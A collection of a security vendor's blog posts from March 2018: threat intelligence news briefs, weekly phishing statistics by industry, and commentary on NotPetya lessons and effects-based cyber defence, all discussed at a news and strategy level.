Conventional wisdom has been that cyber attacks – though disruptive- are manageable. Outbreaks like NotPetya and WannaCry challenge that established wisdom.

Both attacks were not merely disruptive but destructive: wiping out systems they infected, rather than simply hijacking them or holding their data ransom. The operational impact on the affected companies was severe. Maersk, for example, was forced to revert to pen and paper to run its business for days while it rebuilt its IT systems from scratch.

“Imagine a company where a ship with 20,000 containers would enter a port every 15 minutes, and for ten days you have no IT,” CEO Snabe said at Davos.

The lesson for your firm is clear: you need to reimagine the risks to your firm and its operations. In addition to formulating clear contingency plans for major outbreaks (robust, offsite backup and recovery plans certainly beat pen and paper), your firm should re-evaluate its assumptions about worst case scenarios as it weighs current and future information security investments and add some zeros to the “cost of doing nothing.”

Think holistically about threats to your organization

Maersk wasn’t the only global firm affected by NotPetya. FedEx suffered by way of its TNT Express acquisition. US-based Mondelez candy and the drug giant Merck were also hit hard by the virus.  What’s interesting is that none of these firms were intended targets of NotPetya. Rather: they were collateral damage of an attack that experts believe was a Russian-backed campaign designed to disrupt Ukraine’s government and economy.

The moral? Instability in one part of the world (say: the rolling cyber conflict between Russia and Ukraine) can easily spill over national borders in ways that are unpredictable. Maersk’s CEO called his company an “accidental victim” of a nation-state attack. And that’s just about right. The consequence of this is that organizations cannot be too narrowly focused on known threats.

Quality threat intelligence from a reliable provider can help, but you also need to be able to integrate that threat intelligence into your IT operations and information security workflow. An example: NotPetya spread rapidly within corporate networks because it was married to powerful, Windows based exploits known as “Eternal Romance” and “Eternal Blue.” Threat intelligence noting that both nation-state actors and cyber criminal “ransomware” groups were actively leveraging those exploits should have escalated patching and remediation efforts internally. Better patching would have stopped or limited the spread of NotPetya, greatly reducing its operational impact.

Prioritize third party risk

A clear lesson of NotPetya is that third party risk is real and that companies and Boards of Directors need to pay a lot more attention to it.

How so? One of NotPetya’s initial avenues of infection was via a Ukrainian maker of financial software, M.E. Docs. That company, which had been compromised by hackers, unwittingly distributed a signed software update that installed the malware. More than 2,000 firms in Ukraine alone found themselves infected.

Should the presence of an application by a Ukrainian firm on your network raise alarms? Possibly. Especially when coupled with threat intelligence about similar efforts by nation-state actors to infiltrate and disrupt Ukrainian firms. A more holistic approach would merely be to assess the many software and hardware supply chains your firm relies on and the risk and possible consequences of any supply chain attack, then introduce processes that mitigate such risks internally.

 

Paul Roberts is the Editor in Chief at The Security Ledger. You can follow him online at: @paulfroberts and @securityledger.

The post NotPetya’s Challenge? Re-Prioritize Your Information Security appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 13, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Technology

“Japanese game developer Nippon Ichi Software (NIS) has suffered a major data breach and is offering customers, er, $5 as compensation. In an email sent to customers last week, NIS admitted that its American arm had fallen victim to a breach compromising the personal and financial data of its online customers. While it’s unclear how many customers have been affected, NIS has confirmed that the breach took place between 3 January and 26 February and affected two of its online stores, which have since been taken offline. However, during that time frame, hackers were able to make off with customers payment card details, email address and address information, although NIS has said that those who ordered using PayPal have not been affected. NIS noted that it does not store customers’ payment card information and that user accounts are used “primarily to track past orders and gain rewards points.” Data for past orders is stored securely and will only show the last four digits of a credit card, and will not show the CVV security code or expiration date,” NIS said. NIS is recommending, naturally, that all customers change their passwords immediately and check their card statements for any suspicious activity.”

 –The Inquirer

Energy

“A new analysis of industrial control components used by utilities indicated 61 percent of them could cause “severe operational impact” if affected by a cyberattack. The research from cybersecurity firm Dragos, as reported by The Daily Beast, looked at 163 new security vulnerabilities that came to light last year. So far, 72 percent of the vulnerabilities have no known way to be closed. However, only 15 percent of the vulnerabilities are accessible from the outside, with the rest requiring the attacker to have already gained access to a plant operations network. The majority of the security holes are in equipment that are already tightly secured in other ways. The report by Dragos, which covers an array of potential cybersecurity threats worldwide, notes Russian hackers caused an electrical outage in Ukraine over a year ago, and North Korea may be looking to do the same in the United States. Currently, malware known as Covellite is attacking electric utilities in the United States, Europe and parts of east Asia with spear-phishing attacks.”

Power Engineering

Operational Risk

“A security firm, the Romanian Police, and Europol allegedly gained access to the GandCrab Ransomware’s Command & Control servers, which allowed them to recover some of the victim’s decryption keys. This allowed researchers to release a tool that could decrypt some victim’s files. After this breach, the GandCrab developers stated that they would release a second version of GandCrab that included a more secure command & control server in order to prevent a similar compromise in the future. Researchers have since discovered that GandCrab version 2 was released, which contains changes that supposedly make it more secure and allow us to differentiate it from the original version.”

Bleeping Computer

Reputational Risk

“Intel has issued updated microcode to help safeguard its Broadwell and Haswell chips from the Spectre Variant 2 security exploits. According to Intel documents, an array of its older processors, including the Broadwell Xeon E3, Broadwell U/Y, Haswell H,S and Haswell Xeon E3 platforms, have now been fixed and are available to hardware partners. The company’s new microcode updates come a week after Intel also issued updates for its newer chip platforms like Kaby Lake, Coffee Lake and Skylake. The Spectre and Meltdown defects, which account for three variants of a side-channel analysis security issue in server and desktop processors, could potentially allow hackers to access users’ protected data. Meltdown breaks down the mechanism keeping applications from accessing arbitrary system memory, while Spectre tricks other applications into accessing arbitrary locations in their memory. According to Intel’s documentation, the Spectre fixes for Sandy Bridge and Ivy Bridge are still in beta and are being tested by hardware partners.”

 – BBC

The post Weekly Threat Intelligence Brief: March 13, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 12, 2018

weekly-phishing-report

The following data offers a snapshot into the weekly trends of the top industries being targeted by phishing attacks from March 4 –  11, 2018.

This week, we saw a large increase in overall phishing activity – 50% – for the top 20 brands we monitor. With the largest increase in activity being from Internet Search & Navigation Services and the largest decrease being from Computer Hardware. Only two industries saw decreases in phishing this week.

The top 5 industries that saw an increase in phishing activity this week:

  1. Internet Search & Navigation Services (>180%)
  2. Telecommunications (>125%)
  3. Storage & Systems Management Software (>65%)
  4. Computer Software (>45%)
  5. eCommerce (>30%)

 

The top 2 industries that saw a decrease in phishing activity this week: 

  1. Computer Hardware (>80%)
  2. Electronic Payment Systems (>15%)

 

By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.


The post Weekly Phishing Report: March 12, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Thwart Cyber Attackers by Inverting Your Strategy

When it comes to your organization’s cybersecurity, there is no “one size fits all” solution. In the face of today’s dynamic threats – bad actors constantly find new and innovative ways to circumvent existing security apparatuses – many organizations are struggling to get ahead of an attack.

Yes, the more you know – what adversaries are operating in the space, the techniques and procedures leveraged by them, and the tools and vulnerabilities used and exploited to ensure that their efforts yield success – the better positioned you are to defend your assets. However, have you ever thought about approaching this from what we call an “effects-based” approach – looking at the end game of an action as your starting point? By doing so, you’ll better understand the larger cyber threat landscape, and where your organization falls within it.

Initially a military concept, Effects-Based Operations (EBOs) systemically evaluate incidents (such as a major hack) through the lens of strategic centers of gravity — leadership, key essentials, infrastructure, population and military forces. EBOs look at the totality of the system being acted upon and determine the most effective means to achieve the desired end state.

It puts the attackers’ “bottom line” – in this case, their intended consequence – upfront with the purpose of analytically working back from that point to the perpetrator rather than the other way around. This allows network defenders to investigate how current tactics employed by hackers would work against their organization. In addition, security teams can explore other venues not yet compromised (but could be) to identify future threat trending.

Toward this end, security teams can look at the impact of cyber incidents within their respective industries and verticals to begin understanding how and why hostile actors are implementing specific attacks – and what they may look for in targeting their organization.

Recognizing the latter (i.e. data exfiltration or disruptive attacks), rather than focusing on the means and manners in which these objectives are carried out, enable network defenders to identify the causal linkages between such incidents, adding to their core knowledge base of attackers and their operations.

Examples of effects-based trends include infrastructure impedance such as those resulting from distributed denial-of-service (DDoS) attacks; influence schemes (e.g. the suspected Russian hacking of the Democratic National Convention and state voter registration systems); data aggregation typically associated with cyber espionage; “false flag” operations in which adversaries purposefully leave data to implicate another source; and cyber-informed kinetics.

In a domain that continues to favor attackers, network defenders must find any advantage they can to compete against an adversary. An Effects-Based Operation for cybersecurity complements conventional strategies. With this, security teams sift through the volume of looming threats, identifying those that are most pertinent to their enterprise’s interests. This prepares them not only for the near term, but the future as well.

At LookingGlass, we provide clients with a suite of products and services that deliver unified threat protection against sophisticated cyber attacks. If you’d like to learn more about what we can do for your organization, please contact us.

 

The post Thwart Cyber Attackers by Inverting Your Strategy appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 7, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Defense

“According to a Quick Heal report released on Monday, in 2017 their Security Labs detected over 930 million Windows malware that targeted individuals and businesses. The year was dominated by several exploits leaked by the hacker Group “The Shadow Brokers” such as EternalBlue, EternalChampion, EternalRomance and EternalScholar which were responsible for advanced ransomware campaigns such as WannaCry and Notpetya, and a few cryptocurrency mining campaigns. Sanjay Katkar, Joint Managing Director and Chief Technology Officer of Quick Heal Technologies Limited said that the problem of ransomware is going to exacerbate because of growing availability of exploit kits and ransomware-as-a-service.”

 –ET-CIO

Information Security Risk

“A newly uncovered form of Android malware secretly steals sensitive data from infected devices – including full audio recordings of phone calls – and stores it in cloud storage accounts. An invasive form of spyware, RedDrop harvests information from the device, including live recordings of its surroundings, user data including files, photos, contacts, notes, device data and information about saved Wi-Fi networks and nearby hotspots. The first time the malware was seen, it was being distributed via a Chinese language adult content app called CuteActress, but others target those speaking English and other languages. “This is very much a global operation,” a security research reported.”

ZDNet

Operational Risk

“An endpoint security firm has spotted a massive campaign that exploits a recently patched Adobe Flash Player vulnerability to deliver malware. The flaw in question, CVE-2018-4878, is a use-after-free bug that Adobe patched on February 6, following reports that North Korean hackers had been exploiting the vulnerability in attacks aimed at South Korea. The threat group, tracked as APT37, Reaper, Group123 and ScarCruft, has been expanding the scope and sophistication of its campaigns. After Adobe patched the security hole, which allows remote code execution, other malicious actors started looking into ways to exploit CVE-2018-4878.”

Security Week

Technology

“Intel has issued updated microcode to help safeguard its Broadwell and Haswell chips from the Spectre Variant 2 security exploits. According to Intel documents, an array of its older processors, including the Broadwell Xeon E3, Broadwell U/Y, Haswell H,S and Haswell Xeon E3 platforms, have now been fixed and are available to hardware partners. The company’s new microcode updates come a week after Intel also issued updates for its newer chip platforms like Kaby Lake, Coffee Lake and Skylake. The Spectre and Meltdown defects, which account for three variants of a side-channel analysis security issue in server and desktop processors, could potentially allow hackers to access users’ protected data. Meltdown breaks down the mechanism keeping applications from accessing arbitrary system memory, while Spectre tricks other applications into accessing arbitrary locations in their memory. According to Intel’s documentation, the Spectre fixes for Sandy Bridge and Ivy Bridge are still in beta and are being tested by hardware partners.”

 


The post Weekly Threat Intelligence Brief: March 7, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 7, 2018

weekly-phishing-report

The following data offers a snapshot into the weekly trends of the top industries being targeted by phishing attacks from February 25 – March 3, 2018.

This week, we saw a large decrease in overall phishing activity – 39% – for the top 20 brands we monitor. With the largest increase in activity being from Telecommunications and the largest decrease being from eCommerce. Only three industries saw increases in phishing this week.

The top 3 industries that saw an increase in phishing activity this week:

  1. Telecommunications (>40%)
  2. Internet Information Services (>30%)
  3. Computer Hardware (>1%)

 

The top 5 industries that saw a decrease in phishing activity this week: 

  1. eCommerce (>62%)
  2. Internet Search & Navigation Services (>60%)
  3. Computer Software (>45%)
  4. Storage Systems & Management Software (>35%)
  5. Electronic Payment Systems (>28%)

 

By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.


The post Weekly Phishing Report: March 7, 2018 appeared first on LookingGlass Cyber Solutions Inc..